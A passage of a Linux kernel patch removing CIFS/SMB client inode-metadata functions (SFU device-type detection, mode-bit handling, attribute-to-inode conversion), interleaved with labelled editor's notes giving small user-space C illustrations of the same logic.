+-			return -EOPNOTSUPP;
+-		rc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
+-						&fattr.cf_symlink_target, false);
+-		if (rc) {
+-			cifs_dbg(FYI, "%s: query_symlink: %d\n", __func__, rc);
+-			goto cgiiu_exit;
+-		}
+-	}
+-
+-	if (*pinode == NULL) {
+-		/* get new inode */
+-		cifs_fill_uniqueid(sb, &fattr);
+-		*pinode = cifs_iget(sb, &fattr);
+-		if (!*pinode)
+-			rc = -ENOMEM;
+-	} else {
+-		/* we already have inode, update it */
+-
+-		/* if uniqueid is different, return error */
+-		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
+-		    CIFS_I(*pinode)->uniqueid != fattr.cf_uniqueid)) {
+-			CIFS_I(*pinode)->time = 0; /* force reval */
+-			rc = -ESTALE;
+-			goto cgiiu_exit;
+-		}
+-
+-		/* if filetype is different, return error */
+-		rc = cifs_fattr_to_inode(*pinode, &fattr);
+-	}
+-
+-cgiiu_exit:
+-	kfree(fattr.cf_symlink_target);
+-	return rc;
+-}
+-#else
+-int cifs_get_inode_info_unix(struct inode **pinode,
+-			     const unsigned char *full_path,
+-			     struct super_block *sb, unsigned int xid)
+-{
+-	return -EOPNOTSUPP;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int
+-cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+-	      struct cifs_sb_info *cifs_sb, unsigned int xid)
+-{
+-	int rc;
+-	__u32 oplock;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	char buf[24];
+-	unsigned int bytes_read;
+-	char *pbuf;
+-	int buf_type = CIFS_NO_BUFFER;
+-
+-	pbuf = buf;
+-
+-	fattr->cf_mode &= ~S_IFMT;
+-
+-	if (fattr->cf_eof == 0) {
+-		fattr->cf_mode |= S_IFIFO;
+-		fattr->cf_dtype = DT_FIFO;
+-		return 0;
+-	} else if (fattr->cf_eof < 8) {
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-		return -EINVAL;	 /* EOPNOTSUPP? */
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_READ,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, NULL);
+-	if (rc) {
+-		cifs_dbg(FYI, "check sfu type of %s, open rc = %d\n", path, rc);
+-		cifs_put_tlink(tlink);
+-		return rc;
+-	}
+-
+-	/* Read header */
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = 24;
+-
+-	rc = tcon->ses->server->ops->sync_read(xid, &fid, &io_parms,
+-					&bytes_read, &pbuf, &buf_type);
+-	if ((rc == 0) && (bytes_read >= 8)) {
+-		if (memcmp("IntxBLK", pbuf, 8) == 0) {
+-			cifs_dbg(FYI, "Block device\n");
+-			fattr->cf_mode |= S_IFBLK;
+-			fattr->cf_dtype = DT_BLK;
+-			if (bytes_read == 24) {
+-				/* we have enough to decode dev num */
+-				__u64 mjr; /* major */
+-				__u64 mnr; /* minor */
+-				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
+-				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
+-				fattr->cf_rdev = MKDEV(mjr, mnr);
+-			}
+-		} else if (memcmp("IntxCHR", pbuf, 8) == 0) {
+-			cifs_dbg(FYI, "Char device\n");
+-			fattr->cf_mode |= S_IFCHR;
+-			fattr->cf_dtype = DT_CHR;
+-			if (bytes_read == 24) {
+-				/* we have enough to decode dev num */
+-				__u64 mjr; /* major */
+-				__u64 mnr; /* minor */
+-				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
+-				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
+-				fattr->cf_rdev = MKDEV(mjr, mnr);
+-			}
+-		} else if (memcmp("IntxLNK", pbuf, 7) == 0) {
+-			cifs_dbg(FYI, "Symlink\n");
+-			fattr->cf_mode |= S_IFLNK;
+-			fattr->cf_dtype = DT_LNK;
+-		} else {
+-			fattr->cf_mode |= S_IFREG; /* file? */
+-			fattr->cf_dtype = DT_REG;
+-			rc = -EOPNOTSUPP;
+-		}
+-	} else {
+-		fattr->cf_mode |= S_IFREG; /* then it is a file */
+-		fattr->cf_dtype = DT_REG;
+-		rc = -EOPNOTSUPP; /* or some unknown SFU type */
+-	}
+-
+-	tcon->ses->server->ops->close(xid, tcon, &fid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
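/*
 * Editor's note: a hedged illustration of the 24-byte SFU header that
 * cifs_sfu_type() above decodes: an 8-byte tag ("IntxBLK", "IntxCHR",
 * "IntxLNK"), then two little-endian 64-bit device numbers. This is a
 * user-space mock-up; the byte values are invented for the demo.
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

static uint64_t get_le64(const unsigned char *p)
{
	uint64_t v = 0;
	int i;

	for (i = 7; i >= 0; i--)
		v = (v << 8) | p[i];   /* little-endian read */
	return v;
}

int main(void)
{
	unsigned char buf[24] = "IntxBLK";  /* rest of the buffer is zeroed */

	buf[8]  = 8;   /* major = 8 */
	buf[16] = 1;   /* minor = 1 */

	if (memcmp(buf, "IntxBLK", 8) == 0)
		printf("block device %llu:%llu\n",
		       (unsigned long long)get_le64(buf + 8),
		       (unsigned long long)get_le64(buf + 16));
	return 0;
}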
+-
+-#define SFBITS_MASK (S_ISVTX | S_ISGID | S_ISUID)  /* SETFILEBITS valid bits */
+-
+-/*
+- * Fetch mode bits as provided by SFU.
+- *
+- * FIXME: Doesn't this clobber the type bit we got from cifs_sfu_type?
+- */
+-static int cifs_sfu_mode(struct cifs_fattr *fattr, const unsigned char *path,
+-			 struct cifs_sb_info *cifs_sb, unsigned int xid)
+-{
+-#ifdef CONFIG_CIFS_XATTR
+-	ssize_t rc;
+-	char ea_value[4];
+-	__u32 mode;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	if (tcon->ses->server->ops->query_all_EAs == NULL) {
+-		cifs_put_tlink(tlink);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	rc = tcon->ses->server->ops->query_all_EAs(xid, tcon, path,
+-			"SETFILEBITS", ea_value, 4 /* size of buf */,
+-			cifs_sb);
+-	cifs_put_tlink(tlink);
+-	if (rc < 0)
+-		return (int)rc;
+-	else if (rc > 3) {
+-		mode = le32_to_cpu(*((__le32 *)ea_value));
+-		fattr->cf_mode &= ~SFBITS_MASK;
+-		cifs_dbg(FYI, "special bits 0%o org mode 0%o\n",
+-			 mode, fattr->cf_mode);
+-		fattr->cf_mode = (mode & SFBITS_MASK) | fattr->cf_mode;
+-		cifs_dbg(FYI, "special mode bits 0%o\n", mode);
+-	}
+-
+-	return 0;
+-#else
+-	return -EOPNOTSUPP;
+-#endif
+-}
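/*
 * Editor's note: illustrative only. cifs_sfu_mode() above splices the
 * setuid/setgid/sticky bits from the SETFILEBITS EA into an existing
 * mode without disturbing any of the other bits:
 */
#include <stdio.h>
#include <sys/stat.h>

#define SFBITS_MASK (S_ISVTX | S_ISGID | S_ISUID)

int main(void)
{
	unsigned int cf_mode = 0100755;  /* current mode */
	unsigned int ea_mode = 06000;    /* EA says setuid + setgid */

	cf_mode &= ~SFBITS_MASK;             /* drop the old special bits */
	cf_mode |= (ea_mode & SFBITS_MASK);  /* take only special bits from the EA */

	printf("merged mode: 0%o\n", cf_mode);  /* prints 0106755 */
	return 0;
}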
+-
+-/* Fill a cifs_fattr struct with info from POSIX info struct */
+-static void smb311_posix_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
+-				       struct super_block *sb, bool adjust_tz, bool symlink)
+-{
+-	struct smb311_posix_qinfo *info = &data->posix_fi;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-
+-	/* no fattr->flags to set */
+-	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
+-	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
+-
+-	if (info->LastAccessTime)
+-		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	else
+-		ktime_get_coarse_real_ts64(&fattr->cf_atime);
+-
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
+-
+-	if (adjust_tz) {
+-		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
+-		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
+-	}
+-
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
+-	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
+-
+-	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
+-	fattr->cf_mode = (umode_t) le32_to_cpu(info->Mode);
+-	/* The srv fs device id is overridden on network mount so setting rdev isn't needed here */
+-	/* fattr->cf_rdev = le32_to_cpu(info->DeviceId); */
+-
+-	if (symlink) {
+-		fattr->cf_mode |= S_IFLNK;
+-		fattr->cf_dtype = DT_LNK;
+-		fattr->cf_symlink_target = data->symlink_target;
+-		data->symlink_target = NULL;
+-	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode |= S_IFDIR;
+-		fattr->cf_dtype = DT_DIR;
+-	} else { /* file */
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-	}
+-	/* else if reparse point ... TODO: add support for FIFO and blk dev; special file types */
+-
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid; /* TODO: map uid and gid from SID */
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-
+-	cifs_dbg(FYI, "POSIX query info: mode 0x%x uniqueid 0x%llx nlink %d\n",
+-		fattr->cf_mode, fattr->cf_uniqueid, fattr->cf_nlink);
+-}
+-
+-static void cifs_open_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
+-				    struct super_block *sb, bool adjust_tz, bool symlink,
+-				    u32 reparse_tag)
+-{
+-	struct smb2_file_all_info *info = &data->fi;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_cifsattrs = le32_to_cpu(info->Attributes);
+-	if (info->DeletePending)
+-		fattr->cf_flags |= CIFS_FATTR_DELETE_PENDING;
+-
+-	if (info->LastAccessTime)
+-		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	else
+-		ktime_get_coarse_real_ts64(&fattr->cf_atime);
+-
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
+-
+-	if (adjust_tz) {
+-		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
+-		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
+-	}
+-
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
+-	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
+-
+-	fattr->cf_nlink = le32_to_cpu(info->NumberOfLinks);
+-	if (reparse_tag == IO_REPARSE_TAG_LX_SYMLINK) {
+-		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_LNK;
+-	} else if (reparse_tag == IO_REPARSE_TAG_LX_FIFO) {
+-		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_FIFO;
+-	} else if (reparse_tag == IO_REPARSE_TAG_AF_UNIX) {
+-		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_SOCK;
+-	} else if (reparse_tag == IO_REPARSE_TAG_LX_CHR) {
+-		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_CHR;
+-	} else if (reparse_tag == IO_REPARSE_TAG_LX_BLK) {
+-		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_BLK;
+-	} else if (symlink || reparse_tag == IO_REPARSE_TAG_SYMLINK ||
+-		   reparse_tag == IO_REPARSE_TAG_NFS) {
+-		fattr->cf_mode = S_IFLNK;
+-		fattr->cf_dtype = DT_LNK;
+-	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
+-		fattr->cf_dtype = DT_DIR;
+-		/*
+-		 * Server can return wrong NumberOfLinks value for directories
+-		 * when Unix extensions are disabled - fake it.
+-		 */
+-		if (!tcon->unix_ext)
+-			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
+-	} else {
+-		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_REG;
+-
+-		/* clear write bits if ATTR_READONLY is set */
+-		if (fattr->cf_cifsattrs & ATTR_READONLY)
+-			fattr->cf_mode &= ~(S_IWUGO);
+-
+-		/*
+-		 * Don't accept zero nlink from non-unix servers unless
+-		 * delete is pending.  Instead mark it as unknown.
+-		 */
+-		if ((fattr->cf_nlink < 1) && !tcon->unix_ext &&
+-		    !info->DeletePending) {
+-			cifs_dbg(VFS, "bogus file nlink value %u\n",
+-				 fattr->cf_nlink);
+-			fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
+-		}
+-	}
+-
+-	if (S_ISLNK(fattr->cf_mode)) {
+-		fattr->cf_symlink_target = data->symlink_target;
+-		data->symlink_target = NULL;
+-	}
+-
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-}
+-
+-static int
+-cifs_get_file_info(struct file *filp)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct cifs_open_info_data data = {};
+-	struct cifs_fattr fattr;
+-	struct inode *inode = file_inode(filp);
+-	struct cifsFileInfo *cfile = filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	bool symlink = false;
+-	u32 tag = 0;
+-
+-	if (!server->ops->query_file_info)
+-		return -ENOSYS;
+-
+-	xid = get_xid();
+-	rc = server->ops->query_file_info(xid, tcon, cfile, &data);
+-	switch (rc) {
+-	case 0:
+-		/* TODO: add support to query reparse tag */
+-		if (data.symlink_target) {
+-			symlink = true;
+-			tag = IO_REPARSE_TAG_SYMLINK;
+-		}
+-		cifs_open_info_to_fattr(&fattr, &data, inode->i_sb, false, symlink, tag);
+-		break;
+-	case -EREMOTE:
+-		cifs_create_dfs_fattr(&fattr, inode->i_sb);
+-		rc = 0;
+-		break;
+-	case -EOPNOTSUPP:
+-	case -EINVAL:
+-		/*
+-		 * FIXME: legacy server -- fall back to path-based call?
+-		 * for now, just skip revalidating and mark inode for
+-		 * immediate reval.
+-		 */
+-		rc = 0;
+-		CIFS_I(inode)->time = 0;
+-		goto cgfi_exit;
+-	default:
+-		goto cgfi_exit;
+-	}
+-
+-	/*
+-	 * don't bother with SFU junk here -- just mark inode as needing
+-	 * revalidation.
+-	 */
+-	fattr.cf_uniqueid = CIFS_I(inode)->uniqueid;
+-	fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
+-	/* if filetype is different, return error */
+-	rc = cifs_fattr_to_inode(inode, &fattr);
+-cgfi_exit:
+-	cifs_free_open_info(&data);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/* Simple function to return a 64 bit hash of string.  Rarely called */
+-static __u64 simple_hashstr(const char *str)
+-{
+-	const __u64 hash_mult =  1125899906842597ULL; /* a big enough prime */
+-	__u64 hash = 0;
+-
+-	while (*str)
+-		hash = (hash + (__u64) *str++) * hash_mult;
+-
+-	return hash;
+-}
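/*
 * Editor's note: a user-space copy of the simple_hashstr() scheme
 * above, a multiply-and-add string hash with a large prime multiplier;
 * reproduced only so the deleted helper is easy to try out.
 */
#include <stdio.h>
#include <stdint.h>

static uint64_t simple_hashstr(const char *str)
{
	const uint64_t hash_mult = 1125899906842597ULL; /* a big enough prime */
	uint64_t hash = 0;

	while (*str)
		hash = (hash + (uint64_t)*str++) * hash_mult;

	return hash;
}

int main(void)
{
	/* example UNC-style input; any string works */
	printf("%llu\n", (unsigned long long)simple_hashstr("\\\\server\\share"));
	return 0;
}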
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/**
+- * cifs_backup_query_path_info - SMB1 fallback code to get ino
+- *
+- * Fallback code to get file metadata when we don't have access to
+- * full_path (EACCES) and have backup creds.
+- *
+- * @xid:	transaction id used to identify original request in logs
+- * @tcon:	information about the server share we have mounted
+- * @sb:	the superblock stores info such as disk space available
+- * @full_path:	name of the file we are getting the metadata for
+- * @resp_buf:	will be set to cifs resp buf and needs to be freed with
+- * 		cifs_buf_release() when done with @data
+- * @data:	will be set to search info result buffer
+- */
+-static int
+-cifs_backup_query_path_info(int xid,
+-			    struct cifs_tcon *tcon,
+-			    struct super_block *sb,
+-			    const char *full_path,
+-			    void **resp_buf,
+-			    FILE_ALL_INFO **data)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_search_info info = {0};
+-	u16 flags;
+-	int rc;
+-
+-	*resp_buf = NULL;
+-	info.endOfSearch = false;
+-	if (tcon->unix_ext)
+-		info.info_level = SMB_FIND_FILE_UNIX;
+-	else if ((tcon->ses->capabilities &
+-		  tcon->ses->server->vals->cap_nt_find) == 0)
+-		info.info_level = SMB_FIND_FILE_INFO_STANDARD;
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
+-		info.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
+-	else /* no srvino useful for fallback to some netapp */
+-		info.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
+-
+-	flags = CIFS_SEARCH_CLOSE_ALWAYS |
+-		CIFS_SEARCH_CLOSE_AT_END |
+-		CIFS_SEARCH_BACKUP_SEARCH;
+-
+-	rc = CIFSFindFirst(xid, tcon, full_path,
+-			   cifs_sb, NULL, flags, &info, false);
+-	if (rc)
+-		return rc;
+-
+-	*resp_buf = (void *)info.ntwrk_buf_start;
+-	*data = (FILE_ALL_INFO *)info.srch_entries_start;
+-	return 0;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static void cifs_set_fattr_ino(int xid, struct cifs_tcon *tcon, struct super_block *sb,
+-			       struct inode **inode, const char *full_path,
+-			       struct cifs_open_info_data *data, struct cifs_fattr *fattr)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	int rc;
+-
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
+-		if (*inode)
+-			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
+-		else
+-			fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-		return;
+-	}
+-
+-	/*
+-	 * If we have an inode pass a NULL tcon to ensure we don't
+-	 * make a round trip to the server. This only works for SMB2+.
+-	 */
+-	rc = server->ops->get_srv_inum(xid, *inode ? NULL : tcon, cifs_sb, full_path,
+-				       &fattr->cf_uniqueid, data);
+-	if (rc) {
+-		/*
+-		 * If that fails reuse existing ino or generate one
+-		 * and disable server ones
+-		 */
+-		if (*inode)
+-			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
+-		else {
+-			fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-			cifs_autodisable_serverino(cifs_sb);
+-		}
+-		return;
+-	}
+-
+-	/* If no errors, check for zero root inode (invalid) */
+-	if (fattr->cf_uniqueid == 0 && strlen(full_path) == 0) {
+-		cifs_dbg(FYI, "Invalid (0) inodenum\n");
+-		if (*inode) {
+-			/* reuse */
+-			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
+-		} else {
+-			/* make an ino by hashing the UNC */
+-			fattr->cf_flags |= CIFS_FATTR_FAKE_ROOT_INO;
+-			fattr->cf_uniqueid = simple_hashstr(tcon->tree_name);
+-		}
+-	}
+-}
+-
+-static inline bool is_inode_cache_good(struct inode *ino)
+-{
+-	return ino && CIFS_CACHE_READ(CIFS_I(ino)) && CIFS_I(ino)->time != 0;
+-}
+-
+-int cifs_get_inode_info(struct inode **inode, const char *full_path,
+-			struct cifs_open_info_data *data, struct super_block *sb, int xid,
+-			const struct cifs_fid *fid)
+-{
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	bool adjust_tz = false;
+-	struct cifs_fattr fattr = {0};
+-	bool is_reparse_point = false;
+-	struct cifs_open_info_data tmp_data = {};
+-	void *smb1_backup_rsp_buf = NULL;
+-	int rc = 0;
+-	int tmprc = 0;
+-	__u32 reparse_tag = 0;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	/*
+-	 * 1. Fetch file metadata if not provided (data)
+-	 */
+-
+-	if (!data) {
+-		if (is_inode_cache_good(*inode)) {
+-			cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
+-			goto out;
+-		}
+-		rc = server->ops->query_path_info(xid, tcon, cifs_sb, full_path, &tmp_data,
+-						  &adjust_tz, &is_reparse_point);
+-		data = &tmp_data;
+-	}
+-
+-	/*
+-	 * 2. Convert it to internal cifs metadata (fattr)
+-	 */
+-
+-	switch (rc) {
+-	case 0:
+-		/*
+-		 * If the file is a reparse point, it is more complicated
+-		 * since we have to check if its reparse tag matches a known
+-		 * special file type e.g. symlink or fifo or char etc.
+-		 */
+-		if (is_reparse_point && data->symlink_target) {
+-			reparse_tag = IO_REPARSE_TAG_SYMLINK;
+-		} else if ((le32_to_cpu(data->fi.Attributes) & ATTR_REPARSE) &&
+-			   server->ops->query_reparse_tag) {
+-			tmprc = server->ops->query_reparse_tag(xid, tcon, cifs_sb, full_path,
+-							    &reparse_tag);
+-			if (tmprc)
+-				cifs_dbg(FYI, "%s: query_reparse_tag: rc = %d\n", __func__, tmprc);
+-			if (server->ops->query_symlink) {
+-				tmprc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
+-								   &data->symlink_target,
+-								   is_reparse_point);
+-				if (tmprc)
+-					cifs_dbg(FYI, "%s: query_symlink: rc = %d\n", __func__,
+-						 tmprc);
+-			}
+-		}
+-		cifs_open_info_to_fattr(&fattr, data, sb, adjust_tz, is_reparse_point, reparse_tag);
+-		break;
+-	case -EREMOTE:
+-		/* DFS link, no metadata available on this server */
+-		cifs_create_dfs_fattr(&fattr, sb);
+-		rc = 0;
+-		break;
+-	case -EACCES:
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-		/*
+-		 * perm errors, try again with backup flags if possible
+-		 *
+-		 * For SMB2 and later the backup intent flag
+-		 * is already sent if needed on open and there
+-		 * is no path based FindFirst operation to use
+-		 * to retry with
+-		 */
+-		if (backup_cred(cifs_sb) && is_smb1_server(server)) {
+-			/* for easier reading */
+-			FILE_ALL_INFO *fi;
+-			FILE_DIRECTORY_INFO *fdi;
+-			SEARCH_ID_FULL_DIR_INFO *si;
+-
+-			rc = cifs_backup_query_path_info(xid, tcon, sb,
+-							 full_path,
+-							 &smb1_backup_rsp_buf,
+-							 &fi);
+-			if (rc)
+-				goto out;
+-
+-			move_cifs_info_to_smb2(&data->fi, fi);
+-			fdi = (FILE_DIRECTORY_INFO *)fi;
+-			si = (SEARCH_ID_FULL_DIR_INFO *)fi;
+-
+-			cifs_dir_info_to_fattr(&fattr, fdi, cifs_sb);
+-			fattr.cf_uniqueid = le64_to_cpu(si->UniqueId);
+-			/* uniqueid set, skip get inum step */
+-			goto handle_mnt_opt;
+-		} else {
+-			/* nothing we can do, bail out */
+-			goto out;
+-		}
+-#else
+-		goto out;
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		break;
+-	default:
+-		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-	/*
+-	 * 3. Get or update inode number (fattr.cf_uniqueid)
+-	 */
+-
+-	cifs_set_fattr_ino(xid, tcon, sb, inode, full_path, data, &fattr);
+-
+-	/*
+-	 * 4. Tweak fattr based on mount options
+-	 */
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-handle_mnt_opt:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	/* query for SFU type info if supported and needed */
+-	if (fattr.cf_cifsattrs & ATTR_SYSTEM &&
+-	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL) {
+-		tmprc = cifs_sfu_type(&fattr, full_path, cifs_sb, xid);
+-		if (tmprc)
+-			cifs_dbg(FYI, "cifs_sfu_type failed: %d\n", tmprc);
+-	}
+-
+-	/* fill in 0777 bits from ACL */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) {
+-		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, true,
+-				       full_path, fid);
+-		if (rc == -EREMOTE)
+-			rc = 0;
+-		if (rc) {
+-			cifs_dbg(FYI, "%s: Get mode from SID failed. rc=%d\n",
+-				 __func__, rc);
+-			goto out;
+-		}
+-	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) {
+-		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, false,
+-				       full_path, fid);
+-		if (rc == -EREMOTE)
+-			rc = 0;
+-		if (rc) {
+-			cifs_dbg(FYI, "%s: Getting ACL failed with error: %d\n",
+-				 __func__, rc);
+-			goto out;
+-		}
+-	}
+-
+-	/* fill in remaining high mode bits e.g. SUID, VTX */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
+-		cifs_sfu_mode(&fattr, full_path, cifs_sb, xid);
+-
+-	/* check for Minshall+French symlinks */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
+-		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
+-					 full_path);
+-		if (tmprc)
+-			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
+-	}
+-
+-	/*
+-	 * 5. Update inode with final fattr data
+-	 */
+-
+-	if (!*inode) {
+-		*inode = cifs_iget(sb, &fattr);
+-		if (!*inode)
+-			rc = -ENOMEM;
+-	} else {
+-		/* we already have inode, update it */
+-
+-		/* if uniqueid is different, return error */
+-		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
+-		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
+-			CIFS_I(*inode)->time = 0; /* force reval */
+-			rc = -ESTALE;
+-			goto out;
+-		}
+-		/* if filetype is different, return error */
+-		rc = cifs_fattr_to_inode(*inode, &fattr);
+-	}
+-out:
+-	cifs_buf_release(smb1_backup_rsp_buf);
+-	cifs_put_tlink(tlink);
+-	cifs_free_open_info(&tmp_data);
+-	kfree(fattr.cf_symlink_target);
+-	return rc;
+-}
+-
+-int
+-smb311_posix_get_inode_info(struct inode **inode,
+-		    const char *full_path,
+-		    struct super_block *sb, unsigned int xid)
+-{
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	bool adjust_tz = false;
+-	struct cifs_fattr fattr = {0};
+-	bool symlink = false;
+-	struct cifs_open_info_data data = {};
+-	int rc = 0;
+-	int tmprc = 0;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	/*
+-	 * 1. Fetch file metadata
+-	 */
+-
+-	if (is_inode_cache_good(*inode)) {
+-		cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
+-		goto out;
+-	}
+-
+-	rc = smb311_posix_query_path_info(xid, tcon, cifs_sb, full_path, &data, &adjust_tz,
+-					  &symlink);
+-
+-	/*
+-	 * 2. Convert it to internal cifs metadata (fattr)
+-	 */
+-
+-	switch (rc) {
+-	case 0:
+-		smb311_posix_info_to_fattr(&fattr, &data, sb, adjust_tz, symlink);
+-		break;
+-	case -EREMOTE:
+-		/* DFS link, no metadata available on this server */
+-		cifs_create_dfs_fattr(&fattr, sb);
+-		rc = 0;
+-		break;
+-	case -EACCES:
